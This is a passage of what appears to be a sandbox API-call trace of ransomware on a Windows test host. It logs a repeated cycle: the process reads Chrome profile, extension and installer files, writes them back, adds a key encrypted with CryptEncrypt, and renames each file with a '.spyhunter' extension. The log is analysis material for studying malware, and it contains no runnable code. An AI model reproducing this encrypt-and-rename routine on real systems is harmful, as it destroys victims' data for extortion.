Data\\Default\\Extension Rules\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\manifest-000001"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0132.995] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001") returned 111 [0132.995] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".txt") returned 0x0 [0132.995] GetProcessHeap () returned 0x2c0000 [0132.995] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0132.995] ReadFile (in: hFile=0x158, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f364, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f364*=0x29, lpOverlapped=0x0) returned 1 [0132.996] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffffd7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0132.996] WriteFile (in: hFile=0x158, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x270f364, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f364*=0x29, lpOverlapped=0x0) returned 1 [0132.996] GetProcessHeap () returned 0x2c0000 [0132.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0132.996] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.997] WriteFile (in: hFile=0x158, lpBuffer=0x270f3a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f364, lpOverlapped=0x0 | out: lpBuffer=0x270f3a4*, lpNumberOfBytesWritten=0x270f364*=0x4, lpOverlapped=0x0) returned 1 [0132.997] WriteFile (in: hFile=0x158, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f364, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f364*=0x30, lpOverlapped=0x0) returned 1 [0132.997] CloseHandle (hObject=0x158) returned 1 [0132.997] GetProcessHeap () returned 0x2c0000 [0132.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0132.997] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001.spyhunter") returned 121 [0132.997] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\manifest-000001"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\manifest-000001.spyhunter")) returned 1 [0133.031] GetProcessHeap () returned 0x2c0000 [0133.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0133.031] GetProcessHeap () returned 0x2c0000 [0133.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0133.031] GetProcessHeap () returned 0x2c0000 [0133.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4a320 | out: hHeap=0x2c0000) returned 1 [0133.031] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f3a8 | out: pbBuffer=0x270f3a8) returned 1 [0133.031] GetProcessHeap () returned 0x2c0000 [0133.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0133.032] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f3a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f3a0*=0x30) returned 1 [0133.032] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0133.331] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe") returned 88 [0133.331] StrStrW (lpFirst="vcredist_x86.exe", lpSrch=".txt") returned 0x0 [0133.331] GetProcessHeap () returned 0x2c0000 [0133.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0133.331] ReadFile (in: hFile=0x158, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f364, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f364*=0x2800, lpOverlapped=0x0) returned 1 [0133.364] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.364] WriteFile (in: hFile=0x158, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f364, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f364*=0x2800, lpOverlapped=0x0) returned 1 [0133.364] GetProcessHeap () returned 0x2c0000 [0133.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0133.364] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.364] WriteFile (in: hFile=0x158, lpBuffer=0x270f3a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f364, lpOverlapped=0x0 | out: lpBuffer=0x270f3a4*, lpNumberOfBytesWritten=0x270f364*=0x4, lpOverlapped=0x0) returned 1 [0133.527] WriteFile (in: hFile=0x158, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f364, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f364*=0x30, lpOverlapped=0x0) returned 1 [0133.527] CloseHandle (hObject=0x158) returned 1 [0133.527] GetProcessHeap () returned 0x2c0000 [0133.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0133.527] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.spyhunter") returned 98 [0133.527] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.spyhunter" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.spyhunter")) returned 1 [0133.528] GetProcessHeap () returned 0x2c0000 [0133.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0133.528] GetProcessHeap () returned 0x2c0000 [0133.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0133.528] GetProcessHeap () returned 0x2c0000 [0133.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f44d28 | out: hHeap=0x2c0000) returned 1 [0133.728] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f398 | out: pbBuffer=0x270f398) returned 1 [0133.728] GetProcessHeap () returned 0x2c0000 [0133.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0133.728] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f390*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f390*=0x30) returned 1 [0133.729] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0133.739] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json") returned 143 [0133.739] StrStrW (lpFirst="manifest.json", lpSrch=".txt") returned 0x0 [0133.739] GetProcessHeap () returned 0x2c0000 [0133.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0133.739] ReadFile (in: hFile=0x180, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f354, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f354*=0x2d5, lpOverlapped=0x0) returned 1 [0133.782] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xfffffd2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.782] WriteFile (in: hFile=0x180, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2d5, lpNumberOfBytesWritten=0x270f354, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f354*=0x2d5, lpOverlapped=0x0) returned 1 [0133.783] GetProcessHeap () returned 0x2c0000 [0133.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0133.783] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.783] WriteFile (in: hFile=0x180, lpBuffer=0x270f394*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f354, lpOverlapped=0x0 | out: lpBuffer=0x270f394*, lpNumberOfBytesWritten=0x270f354*=0x4, lpOverlapped=0x0) returned 1 [0133.783] WriteFile (in: hFile=0x180, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f354, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f354*=0x30, lpOverlapped=0x0) returned 1 [0133.783] CloseHandle (hObject=0x180) returned 1 [0133.783] GetProcessHeap () returned 0x2c0000 [0133.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0133.784] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json.spyhunter") returned 153 [0133.785] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json.spyhunter")) returned 1 [0133.786] GetProcessHeap () returned 0x2c0000 [0133.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0133.786] GetProcessHeap () returned 0x2c0000 [0133.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0133.786] GetProcessHeap () returned 0x2c0000 [0133.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31de68 | out: hHeap=0x2c0000) returned 1 [0133.788] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f390 | out: pbBuffer=0x270f390) returned 1 [0133.788] GetProcessHeap () returned 0x2c0000 [0133.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0133.788] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f388*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f388*=0x30) returned 1 [0133.788] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0133.788] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json") returned 155 [0133.788] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0133.788] GetProcessHeap () returned 0x2c0000 [0133.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0133.788] ReadFile (in: hFile=0x180, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f34c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f34c*=0xe0, lpOverlapped=0x0) returned 1 [0133.789] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.789] WriteFile (in: hFile=0x180, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x270f34c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f34c*=0xe0, lpOverlapped=0x0) returned 1 [0133.790] GetProcessHeap () returned 0x2c0000 [0133.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0133.790] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.790] WriteFile (in: hFile=0x180, lpBuffer=0x270f38c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f34c, lpOverlapped=0x0 | out: lpBuffer=0x270f38c*, lpNumberOfBytesWritten=0x270f34c*=0x4, lpOverlapped=0x0) returned 1 [0133.790] WriteFile (in: hFile=0x180, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f34c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f34c*=0x30, lpOverlapped=0x0) returned 1 [0133.790] CloseHandle (hObject=0x180) returned 1 [0133.790] GetProcessHeap () returned 0x2c0000 [0133.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0133.790] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json.spyhunter") returned 165 [0133.790] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json.spyhunter")) returned 1 [0133.791] GetProcessHeap () returned 0x2c0000 [0133.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0133.791] GetProcessHeap () returned 0x2c0000 [0133.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0133.791] GetProcessHeap () returned 0x2c0000 [0133.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cefce0 | out: hHeap=0x2c0000) returned 1 [0133.795] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f388 | out: pbBuffer=0x270f388) returned 1 [0133.795] GetProcessHeap () returned 0x2c0000 [0133.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0133.795] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f380*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f380*=0x30) returned 1 [0133.795] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0133.795] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json") returned 155 [0133.795] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0133.795] GetProcessHeap () returned 0x2c0000 [0133.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0133.796] ReadFile (in: hFile=0x180, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f344, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f344*=0xe0, lpOverlapped=0x0) returned 1 [0133.797] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.797] WriteFile (in: hFile=0x180, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x270f344, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f344*=0xe0, lpOverlapped=0x0) returned 1 [0133.797] GetProcessHeap () returned 0x2c0000 [0133.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0133.797] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.797] WriteFile (in: hFile=0x180, lpBuffer=0x270f384*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f344, lpOverlapped=0x0 | out: lpBuffer=0x270f384*, lpNumberOfBytesWritten=0x270f344*=0x4, lpOverlapped=0x0) returned 1 [0133.797] WriteFile (in: hFile=0x180, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f344, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f344*=0x30, lpOverlapped=0x0) returned 1 [0133.797] CloseHandle (hObject=0x180) returned 1 [0133.797] GetProcessHeap () returned 0x2c0000 [0133.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0133.798] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json.spyhunter") returned 165 [0133.798] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json.spyhunter")) returned 1 [0133.798] GetProcessHeap () returned 0x2c0000 [0133.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0133.798] GetProcessHeap () returned 0x2c0000 [0133.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0133.799] GetProcessHeap () returned 0x2c0000 [0133.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cef9d8 | out: hHeap=0x2c0000) returned 1 [0133.800] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f380 | out: pbBuffer=0x270f380) returned 1 [0133.800] GetProcessHeap () returned 0x2c0000 [0133.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0133.800] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f378*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f378*=0x30) returned 1 [0133.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0133.801] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json") returned 155 [0133.813] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0133.813] GetProcessHeap () returned 0x2c0000 [0133.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0133.818] ReadFile (in: hFile=0x180, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f33c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f33c*=0xe0, lpOverlapped=0x0) returned 1 [0133.823] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.823] WriteFile (in: hFile=0x180, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x270f33c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f33c*=0xe0, lpOverlapped=0x0) returned 1 [0133.823] GetProcessHeap () returned 0x2c0000 [0133.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0133.823] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.824] WriteFile (in: hFile=0x180, lpBuffer=0x270f37c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f33c, lpOverlapped=0x0 | out: lpBuffer=0x270f37c*, lpNumberOfBytesWritten=0x270f33c*=0x4, lpOverlapped=0x0) returned 1 [0133.824] WriteFile (in: hFile=0x180, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f33c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f33c*=0x30, lpOverlapped=0x0) returned 1 [0133.824] CloseHandle (hObject=0x180) returned 1 [0133.824] GetProcessHeap () returned 0x2c0000 [0133.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0133.824] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 